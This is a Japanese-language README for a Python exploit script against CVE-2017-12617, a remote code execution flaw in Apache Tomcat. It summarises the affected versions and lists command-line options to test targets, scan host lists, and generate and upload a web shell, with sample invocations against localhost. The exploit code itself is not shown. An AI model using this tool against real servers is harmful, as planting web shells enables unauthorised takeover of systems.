
https://github.com/cyberheartmi9 の更新バージョン
CVE-2017-12617 は、Apache Tomcat で発見された重大なリモートコード実行 (RCE) 脆弱性です。
HTTP PUT が有効になっているシステム(Default サーブレットの "read-only" 初期化パラメータを "false" に設定することによる)が影響を受けます。
Tomcat バージョン 9.0.1 (Beta)、8.5.23、8.0.47、7.0.82 より前のバージョンでは、すべてのオペレーティングシステムにおいて、Default サーブレットが readonly パラメータを false に設定して構成されている場合、または WebDAV サーブレットが有効で readonly パラメータが false に設定されている場合、危険なリモートコード実行 (RCE) 脆弱性が存在します。
./cve-2017-12617.py [オプション]
オプション:
-u ,--url [::] ターゲットURLが脆弱かどうかを確認する
-p,--pwn [::] Webシェルを生成してアップロードする
-l,--list [::] ホストリスト
[+]使用法:
./cve-2017-12617.py -u http://127.0.0.1
./cve-2017-12617.py --url http://127.0.0.1
./cve-2017-12617.py -u http://127.0.0.1 -p pwn
./cve-2017-12617.py --url http://127.0.0.1 -pwn pwn
./cve-2017-12617.py -l hotsts.txt
./cve-2017-12617.py --list hosts.txt
クレジット: https://github.com/cyberheartmi9